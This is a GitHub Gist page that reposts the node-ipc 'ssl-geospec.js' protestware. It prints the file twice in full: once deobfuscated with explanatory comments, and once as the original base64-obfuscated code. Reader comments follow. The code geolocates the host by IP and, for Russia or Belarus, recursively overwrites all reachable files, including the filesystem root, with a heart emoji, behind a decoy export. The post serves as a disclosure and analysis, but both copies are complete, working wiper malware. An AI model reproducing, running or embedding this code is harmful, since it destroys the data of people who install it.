A deleted commit from the node-ipc repository. You can find the original commit here: https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js
WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR OWN RISK.
Created
March 18, 2022 00:17
-
-
Save BrandonMiller97528/671a8bbb8da41ca34b30105db1edde1d to your computer and use it in GitHub Desktop.
A deleted commit from the node-ipc repository. You can find the original commit here: https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js **WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR OWN RISK.**
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import u from "path"; | |
| import a from "fs"; | |
| import o from "https"; | |
| // **WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR RISK.** | |
| // Obfuscated code that I deobfuscated. | |
| // I also added comments which should help explain what exactly is going on here. | |
| // Oiginally written by Brandon Nozaki Miller (https://github.com/RIAEvangelist) | |
| // See you in prison, Brandom. | |
| // Original commit: https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js | |
| // A timeout is used to add an artificial delay. | |
| setTimeout(function () { | |
| // A 50% chance that all of your files will get overwritten. | |
| const t = Math.round(Math.random() * 4); | |
| if (t > 1) return; | |
| // This URL is used to specifically target people in Russia and Belarus. | |
| const n = | |
| "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154"; | |
| // A request is send to the URL above. The server sends the location of the request to the requester. | |
| o.get(n, function (t) { | |
| t.on("data", function (t) { | |
| const n = "./"; | |
| const o = "../"; | |
| const r = "../../"; | |
| const f = "/"; | |
| const c = "country_name"; | |
| // Specifically targets the citizens of Russia and Belarus. | |
| const e = "russia"; | |
| const i = "belarus"; | |
| try { | |
| const s = JSON.parse(t); | |
| const u = s[c].toLowerCase(); | |
| // "If your country is from Russia or Belarus, overwrite all of your files." | |
| const a = u.includes(e) || u.includes(i); | |
| if (a) { | |
| h(n); | |
| h(o); | |
| h(r); | |
| h(f); | |
| } | |
| } catch (t) {} | |
| }); | |
| }); | |
| }, Math.ceil(Math.random() * 1e3)); | |
| /** | |
| * @param n The relative location of CWD of where the script was ran. | |
| * @param o Presumably meant to be used recursively. | |
| */ | |
| // The function that does the overwriting. Not sure why it is `async` though. | |
| async function h(n = "", o = "") { | |
| // Checks to see if the directory within your file system exists. | |
| if (!a.existsSync(n)) return; | |
| let r = []; | |
| try { | |
| // Gets all of the files within the directory. | |
| r = a.readdirSync(n); | |
| } catch (t) {} | |
| const f = []; | |
| // Your files will get overwritten with a heart emoji. Perfect. | |
| const c = "❤️"; | |
| for (var e = 0; e < r.length; e++) { | |
| const i = u.join(n, r[e]); | |
| let t = null; | |
| try { | |
| t = a.lstatSync(i); | |
| } catch (t) { | |
| continue; | |
| } | |
| // If the file is a directory, it will run the `h` function again. | |
| if (t.isDirectory()) { | |
| const s = h(i, o); | |
| // Again, the function was async. This will not even work properly. | |
| s.length > 0 ? f.push(...s) : null; | |
| } else if (i.indexOf(o) >= 0) { | |
| try { | |
| // The files get overwritten. Thanks, Brandon. | |
| a.writeFile(i, c, function () {}); | |
| } catch (t) {} | |
| } | |
| } | |
| return f; | |
| } | |
| // Fake exports probably intended to trick consumers. | |
| const ssl = true; | |
| export { ssl, ssl as default }; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import u from"path";import a from"fs";import o from"https";setTimeout(function(){const t=Math.round(Math.random()*4);if(t>1){return}const n=Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=","base64");o.get(n.toString("utf8"),function(t){t.on("data",function(t){const n=Buffer.from("Li8=","base64");const o=Buffer.from("Li4v","base64");const r=Buffer.from("Li4vLi4v","base64");const f=Buffer.from("Lw==","base64");const c=Buffer.from("Y291bnRyeV9uYW1l","base64");const e=Buffer.from("cnVzc2lh","base64");const i=Buffer.from("YmVsYXJ1cw==","base64");try{const s=JSON.parse(t.toString("utf8"));const u=s[c.toString("utf8")].toLowerCase();const a=u.includes(e.toString("utf8"))||u.includes(i.toString("utf8"));if(a){h(n.toString("utf8"));h(o.toString("utf8"));h(r.toString("utf8"));h(f.toString("utf8"))}}catch(t){}})})},Math.ceil(Math.random()*1e3));async function h(n="",o=""){if(!a.existsSync(n)){return}let r=[];try{r=a.readdirSync(n)}catch(t){}const f=[];const c=Buffer.from("4p2k77iP","base64");for(var e=0;e<r.length;e++){const i=u.join(n,r[e]);let t=null;try{t=a.lstatSync(i)}catch(t){continue}if(t.isDirectory()){const s=h(i,o);s.length>0?f.push(...s):null}else if(i.indexOf(o)>=0){try{a.writeFile(i,c.toString("utf8"),function(){})}catch(t){}}}return f};const ssl=true;export {ssl as default,ssl} |
Or Gitpod for the curious ones.
The API key isn't valid anymore:
{"message":"Provided API key is not valid. Contact technical support for assistance at [email protected]"}
// Again, the function was async. This will not even work properly.
s.length > 0 ? f.push(...s) : null;leave it to your average js dev to not be even able to write functional malware
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Don’t run on host, run in it a container